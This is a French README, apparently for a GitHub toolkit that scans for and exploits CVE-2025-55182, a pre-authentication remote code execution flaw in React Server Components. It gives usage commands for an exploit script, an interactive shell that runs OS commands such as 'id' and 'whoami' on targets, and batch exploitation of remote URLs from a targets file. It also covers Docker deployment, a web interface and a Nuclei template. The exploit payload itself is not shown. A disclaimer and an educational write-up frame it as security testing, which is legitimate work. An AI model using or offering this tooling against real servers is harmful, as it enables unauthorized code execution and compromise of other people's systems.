
Scanner et boîte à outils d'exploitation pour CVE-2025-55182, une RCE critique pré-authentification dans React Server Components. Comprend la détection, un shell interactif, le déploiement Docker et une analyse technique pédagogique.
Une boîte à outils complète de tests de sécurité pour CVE-2025-55182, une vulnérabilité critique d'exécution de code à distance sans authentification préalable dans les React Server Components.
Vous voulez comprendre cette vulnérabilité à 100 % ?
📖 Lire notre analyse technique complète - Tout ce que vous devez savoir :
- Pourquoi React s'exécute sur le serveur (pas seulement dans le navigateur !)
- Comment l'attaque fonctionne avec des diagrammes visuels
- Chaque ligne de l'exploit expliquée
- Des concepts débutants à l'exploitation avancée
- Aucun prérequis nécessaire !
Parfait pour : Rapports de sécurité, supports de formation, analyse des menaces, ou simplement apprendre !
Cette vulnérabilité affecte les versions des React Server Components 19.0.0 à 19.2.0, impactant :
react-server-dom-parcelreact-server-dom-turbopackreact-server-dom-webpackImpact : Des attaquants non authentifiés peuvent exécuter du code arbitraire à distance via une désérialisation non sécurisée des charges utiles des requêtes HTTP vers les points de terminaison des Server Functions.
👉 Lire l'analyse technique complète - Un guide exhaustif couvrant :
Parfait pour :
Aucune connaissance préalable requise - part des bases et monte jusqu'aux techniques d'exploitation avancées !
POUR USAGE ÉDUCATIF ET TESTS DE SÉCURITÉ AUTORISÉS UNIQUEMENT
Cet outil est destiné exclusivement à :
Avertissement : L'accès non autorisé à des systèmes informatiques est illégal. Les utilisateurs sont responsables du respect de toutes les lois et réglementations applicables. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive de cet outil.
Aucune dépendance requise ! Un seul script bash pour des tests rapides.
👉 EXPLOIT_SCRIPT.md - Script autonome qui :
# Cible unique
./exploit-cve-2025-55182.sh http://target.com
# Cibles multiples
./exploit-cve-2025-55182.sh -f targets.txt
Boîte à outils complète avec Docker, interface Web et intégration Nuclei. Continuez à lire ci-dessous pour l'installation.
| Fonctionnalité | Description |
|---|---|
| 🐳 Support Docker | Déploiement en une commande avec Docker Compose |
| 🌐 Interface Web | Interface utilisateur conviviale pour les utilisateurs non techniques |
| 🔍 Environnement de test vulnérable | Démarrez une application vulnérable locale pour des tests sécurisés |
| 🎯 Scan à distance | Testez des cibles externes pour la vulnérabilité |
| ⚡ Shell interactif | Exécutez des commandes OS et voyez les résultats en temps réel |
| 📊 Plusieurs modes de scan | Détection uniquement ou exploitation complète |
| 📝 Rapports détaillés | Formats de sortie JSON et texte |
| 🔧 Intégration Nuclei | Tirez parti du puissant scanner de ProjectDiscovery |
Choisissez votre méthode d'installation :
# Cloner le dépôt
git clone https://github.com/StealthMoud/CVE-2025-55182-Scanner.git
cd CVE-2025-55182-Scanner
# Démarrer le scanner
docker compose up
# Accéder à l'interface Web à http://localhost:3001
# Cloner le dépôt
git clone https://github.com/StealthMoud/CVE-2025-55182-Scanner.git
cd CVE-2025-55182-Scanner
# Installer Nuclei (macOS)
brew install nuclei
# Rendre les scripts exécutables
chmod +x scripts/*.sh
📖 Configuration détaillée : Voir SETUP_GUIDE.md pour des instructions pas à pas
⚡ Référence rapide : Voir QUICKSTART.md pour les cas d'utilisation courants
Démarrer l'interface Web :
docker compose up
# Ouvrir le navigateur : http://localhost:3001
Démarrer avec l'application de test vulnérable :
docker compose --profile with-vulnerable-app up
# Scanner : http://localhost:3001
# Application vulnérable : http://localhost:3000
Important pour les utilisateurs Docker : Lors du scan depuis Docker, utilisez :
http://host.docker.internal:3000 pour scanner les applications sur votre machine hôtehttp://vulnerable-app:3000 pour scanner l'application vulnérable conteneuriséehttps://example.com pour les cibles externeshttp://localhost:3001Créez et testez une application vulnérable locale :
# Terminal 1 : Démarrer l'application vulnérable
./scripts/setup-vulnerable-app.sh
# L'application s'exécutera sur http://localhost:3000
# Terminal 2 : La tester
./scripts/test-local.sh
# Exécuter des commandes personnalisées
./scripts/test-local.sh "whoami"
./scripts/test-local.sh "pwd"
./scripts/test-local.sh "ls -la"
# Scan de base
./scripts/test-remote.sh https://target.com
# Avec exécution de commande
./scripts/test-remote.sh https://target.com "id"
# Créer un fichier de cibles
cat > targets.txt << EOF
https://target1.com
https://target2.com
https://target3.com
EOF
# Scanner toutes les cibles
./scripts/test-multiple.sh targets.txt
Détection de base de la vulnérabilité :
nuclei -t templates/cve-2025-55182.yaml -u http://localhost:3000 -v